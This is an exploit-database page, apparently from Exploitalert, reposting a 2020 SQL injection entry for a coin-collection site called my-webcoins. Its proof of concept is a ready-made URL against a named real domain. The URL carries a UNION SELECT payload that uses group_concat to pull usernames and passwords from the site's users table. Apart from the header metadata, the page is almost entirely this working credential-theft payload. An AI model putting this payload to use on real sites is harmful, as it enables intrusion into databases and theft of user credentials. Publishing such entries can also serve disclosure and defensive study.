Advertisement






my-webcoins - SQL Injection vulnerability

CVE Category Price Severity
N/A CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2020-11-28
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020110225

Below is a copy:

my-webcoins - SQL Injection vulnerability
-------------------------------------------------------------*
#Exploit Title: my-webcoins - SQL Injection vulnerability
#Date: 2020-11-01
#Exploit Author: ERa
#Category:webapps
#Tested On: windows 10, Firefox
 
Proof of Concept:

Demo :

http://www.my-webcoins.de/coin.php?id=23302%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(username,0x3a,userpass,%27%3Cbr%3E%27),21,22,23,24,25,26,27%20from%20users--

-------------------------------------------------------------*
#Discovered by: ERa
#Email: [email protected]
-------------------------------------------------------------*

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.